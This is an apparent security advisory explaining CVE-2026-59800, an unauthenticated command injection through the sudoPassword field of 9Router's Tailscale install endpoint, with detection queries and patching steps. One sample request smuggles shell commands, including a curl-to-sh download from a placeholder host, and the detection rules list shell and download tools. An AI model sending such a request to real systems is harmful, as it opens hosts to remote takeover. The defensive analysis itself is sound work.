eastbaycyber

CVE-2026-59800: Unauthenticated Command Injection in 9Router

CVE explainers 10 min read
SR
Security Research Desk Expert reviewed
Threat intelligence · Human-verified · Updated 2026-07-07
▲ Escalation ViewOne CVE, briefed at three altitudes — skim the Brief, weigh the Impact, or work the Runbook. The way a SOC actually reads it.
CISOBrief · 30-second brief

TL;DR - Critical unauthenticated RCE in 9Router before 0.4.44. - Internet-exposed instances are at immediate risk and should be upgraded. - Exploitation has been observed; treat remediation as urgent.

Vulnerability at a Glance

Field Value
CVE ID CVE-2026-59800
CVSS score 9.8 (Critical)
Attack vector Network
Auth required No
Patch available Yes, upgrade to 9Router 0.4.44

CVE-2026-59800 is a critical remote command injection vulnerability in decolua 9Router. According to the NVD description, the bug affects POST /api/tunnel/tailscale-install, an endpoint that is not protected by the expected dashboard authorization middleware. That design gap means an unauthenticated remote attacker can reach code paths that should have required prior access control.

The impact is especially severe because the vulnerable path writes attacker-controlled input from the sudoPassword field into the stdin of a sudo -S sh child process. Under operational conditions where sudo does not prompt for a password, that input can be interpreted by sh as shell commands. NVD reports exploitation evidence observed by the Shadowserver Foundation on 2026-07-04 UTC, so this is not just a theoretical issue.

What Is This Vulnerability?

At its core, this vulnerability is a combination of missing authorization and unsafe process execution. The NVD record states that POST /api/tunnel/tailscale-install is not covered by the dashboard middleware matcher. In practical terms, the route is reachable without the authorization checks that administrators would reasonably expect for a Tailscale installation action. That is the first half of the problem: unauthenticated reachability.

The second half is the command execution sink. The application reportedly sends the sudoPassword request-body value to the stdin of a sudo -S sh process. This is inherently dangerous because it mixes privileged shell execution with attacker-controlled input. If sudo requests a password, that input may be treated as a password attempt. But if sudo does not request a password, the shell can read and execute the same input as commands.

This becomes exploitable in several realistic deployment scenarios specifically described by NVD: the process runs as root, NOPASSWD is configured in sudoers, or a valid sudo timestamp cache already exists. In those conditions, the application behavior effectively creates an unauthenticated remote command execution path. That is why the CVSS score is near-maximum and why defenders should assume full host compromise is possible after successful exploitation.

Technical Notes

A simplified unsafe pattern based on the NVD description would look like this:

# Conceptual flow described by NVD, not vendor source code
echo "$sudoPassword" | sudo -S sh

If the shell receives attacker-controlled content instead of a password prompt, the payload can become executable shell input. For example, defenders should recognize that any architecture passing untrusted HTTP body data into privileged shell stdin is high risk.

AnalystImpact · assess the risk

Who Is Affected?

The affected product is decolua 9Router. The version range identified in the NVD record is all versions before 0.4.44. That means installations running 0.4.43 or earlier should be treated as vulnerable unless the operator has independently verified a backported fix, custom patch, or compensating control. In the absence of such evidence, defenders should assume exposure.

The fixed version boundary is clearly stated as 9Router 0.4.44. If you are inventorying assets, focus on any host running 9Router with management interfaces exposed to untrusted networks, especially internet-facing systems. Because the vulnerable endpoint is HTTP-accessible and does not require authentication, externally reachable deployments carry the highest immediate risk.

There is not enough source material here to assert packaging-specific version names for every distribution or container registry. If your environment deploys 9Router through GitHub releases, a custom build pipeline, or containerized images, confirm the precise installed version from the binary, image tag, package manifest, or deployment repository. If you cannot confirm that the runtime version is 0.4.44 or later, treat the instance as vulnerable until proven otherwise.

Technical Notes

Example version validation approaches:

# Check container image tags
docker ps --format 'table {{.Names}}    {{.Image}}'

# Inspect Kubernetes deployment image
kubectl get deploy -A -o wide | grep -i 9router

# If running from a local checkout, inspect release or binary metadata
strings /path/to/9router-binary | grep -E '0\.4\.(4[0-9]|[0-3][0-9])'

If version output is not straightforward, use deployment records, Git tags, CI artifacts, or release manifests to determine whether the running build predates 0.4.44.

CVSS Score Breakdown

The NVD base score is 9.8, which places this issue firmly in Critical territory. Although the full vector string was not available in the retrieved source material, the score aligns with a remote, unauthenticated vulnerability that requires no user interaction and leads to complete compromise of confidentiality, integrity, and availability. In other words, this is the classic high-priority patch-now profile.

Each likely component of the score matters operationally. A network attack vector means an attacker can reach the vulnerable functionality over HTTP rather than needing local access. No privileges required means they do not need an account first. No user interaction means there is no phishing step or admin click required. High impacts across all three CIA categories are justified because arbitrary OS command execution can expose secrets, alter configurations, deploy malware, and disrupt service.

One important caveat: because the full vector string was not retrieved from a primary source in the provided data, defenders should avoid reproducing a full CVSS vector unless they verify it directly from an authoritative entry. That does not materially change prioritization here. A 9.8 unauthenticated network RCE with observed exploitation should be treated as emergency remediation work.

Exploitation Status

Exploitation is reported as observed in the wild. The NVD description explicitly states that exploitation evidence was first observed by the Shadowserver Foundation on 2026-07-04 UTC. That is the most important operational fact beyond the technical root cause, because it means adversaries were already using or probing this issue before public disclosure matured.

At the time of the provided research note, CISA KEV status is false, meaning the CVE is not currently listed in the Known Exploited Vulnerabilities catalog. Administrators should not interpret that as low risk. KEV lag is common, and the NVD exploitation note is sufficient reason to accelerate remediation and exposure reduction immediately.

As for proof-of-concept availability, the retrieved sources do not confirm a public PoC repository. That is different from saying no PoC exists. It only means a primary-source PoC was not identified in the material provided. In practice, once a critical unauthenticated injection flaw is public and exploitation has been observed, defenders should assume exploit development is trivial for capable attackers.

Technical Notes

A suspicious request pattern would target the vulnerable endpoint directly:

POST /api/tunnel/tailscale-install HTTP/1.1
Host: vulnerable-host
Content-Type: application/json

{"sudoPassword":"id; uname -a; curl http://example.invalid/payload.sh | sh"}

The exact payloads used in the wild are not confirmed here, but requests containing shell metacharacters in sudoPassword should be treated as high-signal indicators.

ResponderRunbook · act now

How to Detect It

Start by reviewing HTTP access logs, reverse proxy logs, application logs, and EDR telemetry for requests to POST /api/tunnel/tailscale-install. Because the issue is unauthenticated, repeated access attempts from unfamiliar IP addresses, especially from internet ranges that do not normally administer the service, should be investigated. Focus on requests with JSON bodies containing sudoPassword, shell separators such as ;, &&, |, backticks, $(), or suspicious download-and-execute patterns.

You should also correlate web requests with process execution on the host. The vulnerable behavior described by NVD involves sudo -S sh, so process telemetry showing sudo, sh, bash, curl, wget, nc, or python -c launched near the same timestamp as requests to the Tailscale install endpoint is highly suspicious. Since successful exploitation may lead to follow-on persistence or credential theft, widen your hunt to new users, modified SSH keys, cron jobs, systemd service changes, and outbound connections to unusual infrastructure.

Technical Notes

Example log hunting patterns:

# Web or reverse proxy logs
grep -R 'POST /api/tunnel/tailscale-install' /var/log/nginx /var/log/apache2 2>/dev/null

# Hunt for suspicious body fragments if request bodies are logged
grep -R -E 'sudoPassword|curl |wget |;|&&|\$\(|`' /var/log 2>/dev/null

Example Sigma-style detection logic concept:

title: Suspicious 9Router Tailscale Install Requests
logsource:
  category: webserver
detection:
  selection_endpoint:
    cs-method: POST
    cs-uri-stem: /api/tunnel/tailscale-install
  selection_body:
    request_body|contains:
      - "sudoPassword"
      - ";"
      - "&&"
      - "$()"
      - "| sh"
  condition: selection_endpoint and selection_body
level: high

Example Splunk query:

index=web OR index=proxy
("POST /api/tunnel/tailscale-install" OR uri_path="/api/tunnel/tailscale-install")
| eval suspicious=if(match(_raw,"sudoPassword|;|&&|\\$\\(|\\| sh|curl |wget "),1,0)
| search suspicious=1
| stats count values(src_ip) values(user_agent) by host

If logs do not capture request bodies, prioritize process telemetry on the host:

# Linux process accounting or EDR search concept
ps -ef | egrep 'sudo| sh |bash|curl|wget|nc'
journalctl --since "2026-07-04" | egrep 'sudo|tailscale-install|curl|wget'

Mitigation and Patching

The primary mitigation is to upgrade 9Router to version 0.4.44. The NVD record clearly identifies the vulnerable range as before 0.4.44, making 0.4.44 the fixed version defenders should target. If you operate multiple instances, prioritize internet-facing systems first, then internally exposed management systems, then lower-risk lab environments.

If you cannot patch immediately, reduce exposure around the vulnerable endpoint. Restrict access to the 9Router management interface using firewall rules, reverse proxy access controls, VPN-only administration, or IP allowlisting. Because the flaw is unauthenticated, simply relying on “nobody knows this URL” is not defensible. You should also review sudoers posture and avoid NOPASSWD for flows associated with the application where possible, though that should be treated as a compensating control, not a substitute for patching.

In the absence of vendor-published workaround details beyond the fixed version, defenders should assume the safest interim posture is to make the interface non-public and block access to the vulnerable route upstream. If your deployment supports custom routing or middleware controls, explicitly deny POST /api/tunnel/tailscale-install from untrusted sources until the upgrade is complete.

Technical Notes

Upgrade examples will vary by deployment model. Use the one that matches your environment.

# Git-based deployment example
git fetch --tags
git checkout 0.4.44
# then rebuild/restart according to your service procedure
# Containerized deployment example
docker pull <your-9router-image>:0.4.44
docker stop 9router
docker rm 9router
docker run -d --name 9router <your-9router-image>:0.4.44
# Kubernetes example
kubectl set image deployment/9router 9router=<your-9router-image>:0.4.44
kubectl rollout status deployment/9router

Example temporary reverse proxy block:

location = /api/tunnel/tailscale-install {
    deny all;
    return 403;
}

Example host firewall restriction:

# Allow only a trusted admin subnet to reach the service port
iptables -A INPUT -p tcp --dport <9router-port> ! -s <trusted-subnet>/24 -j DROP

After patching, verify the running version and review the host for post-exploitation artifacts before returning it to normal exposure. If there is any sign exploitation occurred, rotate credentials, inspect persistence mechanisms, and consider a full rebuild.

References

The primary authoritative source is the NVD entry for CVE-2026-59800, which provides the vulnerability description, affected version boundary, CVSS score, and the note that exploitation evidence was observed by Shadowserver on 2026-07-04 UTC. That source should anchor remediation and triage decisions.

Additional references include the GitHub Security Advisory for the decolua 9Router project, the project releases page where version 0.4.44 can be tracked, the VulnCheck advisory title corroborating the affected range, and the CISA KEV catalog for current inclusion status. At the time reflected by the research note, KEV inclusion was not present, but defenders should still prioritize based on NVD’s observed exploitation statement.

For further understanding of related concepts, you may find these articles helpful: What is MDR? A Practitioner’s Definition and Jump Server (Bastion Host).

This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.

Last verified: 2026-07-07

Disclaimer: This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.